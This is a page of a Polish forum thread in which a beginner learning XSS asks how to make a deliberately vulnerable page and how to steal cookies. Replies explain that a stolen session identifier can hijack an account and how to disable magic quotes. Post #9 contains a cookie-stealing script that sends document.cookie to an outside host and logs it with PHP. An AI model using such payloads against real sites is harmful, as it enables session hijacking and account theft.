Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 12

Temat: Strona podatna - xss.

  1. #1
    Zarejestrowany
    Jun 2011
    Postów
    39

    Domyślnie Strona podatna - xss.

    Cześć, jak zapewne pamiętacie jakiś czas temu wysłałem kolejny trolowski temat z pytaniem jak zacząć przygodę z hackingiem. Poczytałem trochę, poszperałem po różnych stronach i natrafiłem na ataki typu XSS i tu pojawia się kilka moich pytań, nigdzie nie znalazłem na nie odpowiedzi.

    1. Chciałem stworzyć stronę podatną na atak XSS jednak ona jest sama w sobie odporna, może ktoś podesłać jakąś najprostszą stronę która jest nieodporna ? (chodzi mi o taką którą mogę wrzucić na własny serwer)

    2. Czy I.PB przechowuje hasła i loginy w cookie ?

    3. Czy jeśli ktoś wejdzie na zainfekowaną stroną prześlie WSZYSTKIE jego cookie do podanego pliku podczas infekowania ?

    Dziękuję z góry za wszelką pomoc.

  2. #2
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    Cytat Napisał Kefir Zobacz post
    1. Chciałem stworzyć stronę podatną na atak XSS (...) jakąś najprostszą stronę która jest nieodporna ? (chodzi mi o taką którą mogę wrzucić na własny serwer)
    Linki podane na końcu mojego posta zawierają demonstracje. Poszukaj też "xss demo" a znajdziesz więcej.

    Cytat Napisał Kefir Zobacz post
    3. Czy jeśli ktoś wejdzie na zainfekowaną stroną prześlie WSZYSTKIE jego cookie do podanego pliku podczas infekowania ?
    Nie. Musisz wiedzieć, jakie cookie ma ofiara. Istnieje również limit nałożony na domenę, jeśli chodzi o dostęp.


    Ostatnio edytowane przez Mad_Dud : 08-21-2011 - 19:36

  3. #3
    Zarejestrowany
    Jun 2011
    Postów
    39

    Domyślnie

    Chodzi mi o konkretny plik cookie z danej strony który możliwe że będzie zawierał hasło i login, da się jakoś zdefiniować żeby pobrało m.i.n ten plik ?

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Nikt przy zdrowyych zmyslach nie zapisuje loginu i hasla w cookie. User loguje sie do strony, tworzona jest sesja i co najwyzej indentyfikator aktywnej sesji jest w cookie... Ten sam identyfikator jest w bazie przypisany do usera na jakis czas (N minut albo do wylogowania, cokolwiek bedzie wczesniej) i jesli masz ten indentyfikator w cookie to jestes zalogowany, nie to nie.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  5. #5
    Zarejestrowany
    Jun 2011
    Postów
    39

    Domyślnie

    Czyli jak dobrze rozumiem jedyne co mogę uzyskać z cookie jest ten identyfikator sesji. Czy mogę go użyć aby się zalogować na interesujące konto ?

  6. #6
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    Tak, jeśli jest to jedyny element zaimplementowany do uwierzytelniania.

  7. #7
    Zarejestrowany
    Jun 2011
    Postów
    39

    Domyślnie

    Wielkie dzięki za pomoc, bardzo się to przydało. Jednak nadal mam jeden problem, nie potrafię zrobić tej strony która ma być podatna. Mam kod który chyba jest najprostszy stworzyłem miejsce do wpisywania wiadomości potem za pomocą PHP wyświetlam tę wiadomość obok, wszystkie znaczniki z HTML działają ale za to <script>alert("XSS");</script> już nie działa bo dodaje slash'e. Jest jakiś sposób żeby to ominąć ?

  8. #8
    Zarejestrowany
    Aug 2011
    Postów
    3

    Domyślnie

    W php.ini wyłącz magic_quotes_gpc

    PHP: What are Magic Quotes - Manual

  9. #9
    Zarejestrowany
    Jun 2011
    Postów
    39

    Domyślnie

    Mam kolejny problem próbowałem napisać własną stronę która pobierze cookie i prześle je do mojego pliku, jednak cały czas wywala mi błąd. Może wy wiecie o co chodzi bo mi już nic nie przychodzi do głowy :/

    Kod:
    [Enter code here]<html>
    <head>
    <title>
    ...
    </title>
    </head>
    <body>
    <script>self.location.href='http://www.dziadek-test.cba.pl/index.php?dane='%2Bescape(document.cookie);</script>
    <?PHP
    $plik=fopen('dane.txt'.'a');
    fputs($plik.urldecode($_GET['dane']);
    fclose($plik);
    ?>
     
    </body>
    </html>
    Kod strony.
    Kod:
    Parse error: syntax error, unexpected ';' in /var/www/virtual/dziadek-test.cba.pl/index.php on line 11
    Treść błędu. Proszę o pomoc.

  10. #10
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    hint: zamiast rozdzielac argumenty funkcji, laczysz je.
    War, war never changes.

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj